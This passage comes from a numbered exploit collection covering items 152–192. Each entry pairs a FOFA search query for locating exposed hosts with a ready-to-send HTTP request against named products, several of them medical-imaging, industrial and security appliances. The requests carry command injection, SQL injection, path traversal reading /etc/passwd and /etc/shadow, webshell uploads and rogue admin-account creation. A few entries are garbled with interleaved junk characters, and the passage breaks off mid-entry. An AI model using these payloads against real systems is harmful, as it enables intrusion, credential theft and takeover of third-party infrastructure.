Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd


154. Tianwell fire rescue operations dispatch platform: SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}


155. LyLme Spage navigation page: arbitrary file upload via file.php
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

* K" S( s2 |  f159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传! f! l7 i( ]$ \( C9 s- F
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
# r8 K3 \' F! q& ?; S) v% KPOST /webservices/WebJobUpload.asmx HTTP/1.1
: J  m9 @0 l' O3 n) H& ?/ FHost: x.x.x.x6 F' \0 v4 v+ N9 f2 O8 d. X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; H. G7 X2 |: r( A
Content-Length: 1080( o' c/ U3 |" O* v
Accept-Encoding: gzip, deflate: m: Y! |% o, x: R/ n& {
Connection: close
) i1 C8 q# b1 L' uContent-Type: text/xml; charset=utf-8
8 p8 W/ z6 L9 T( }Soapaction: "http://rainier/jobUpload"1 c4 v5 L7 k& g" t1 y- h
' D2 L6 i' m+ l
<?xml version="1.0" encoding="utf-8"?>
; v) L4 u/ n8 A, p1 s1 @, Z9 G<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" b8 ~0 K, t8 C& o  V3 X! A/ q
<soap:Body>
4 l; [# Q3 _; r: L5 l2 b( s<jobUpload xmlns="http://rainier">+ Q# Q1 \/ f* V7 I0 g8 s
<vcode>1</vcode>
! i( ~1 d/ q  j: I' d<subFolder></subFolder>. v, ?; @% o2 o
<fileName>abcrce.asmx</fileName>
# H8 T' a$ b! d+ i+ |/ {9 f3 y) M<bufValue>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</bufValue>
3 i0 K4 Z- _* O* L</jobUpload>
" `* a: P8 L' y( m( L* j</soap:Body>
1 ~! y: [% n$ W+ D/ y8 _</soap:Envelope>& O# b7 h4 b% ], N; C

" B" c5 A9 r& x/ J% I6 v' b, m/ |* x  `! s2 V5 Z( G
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
$ x+ J8 w: l7 v* G9 g) ~) N1 u
. ~3 y0 T2 @$ `1 p# h
160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

8 f8 z" l, S8 q" D" C# q184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加8 w  T6 R& s+ |) W+ C
FOFA:server="SunFull-Webs"9 B( |/ j+ u  q8 S" \( W2 R/ `
POST /soap/AddUser HTTP/1.12 ]+ T6 ?2 s7 b( ^, K/ s
Host: your-ip" `2 O) k6 f. R6 r) \. f1 U$ B' M* c
Accept-Encoding: gzip, deflate- {2 }9 C' w$ K5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 z5 m0 O' i0 o+ p9 X& pAccept: application/xml, text/xml, */*; q=0.01( }$ V" |% K; M7 x/ ?! |
Content-Type: text/xml; charset=utf-87 q8 O  ~! `0 H! a$ Q3 `) D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, W8 v( b' C; P) D7 ^X-Requested-With: XMLHttpRequest5 ^5 ]. Z, N$ `% T/ y4 r5 T  o
( f% X, X: J( X9 Y0 E# j1 t& b

' T! i! ?7 W5 m3 Qinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')) R" b6 o3 c8 a/ A0 G) V2 H$ }! q
$ E; \, _' F" V5 T0 [) H

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通 (Esafenet) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
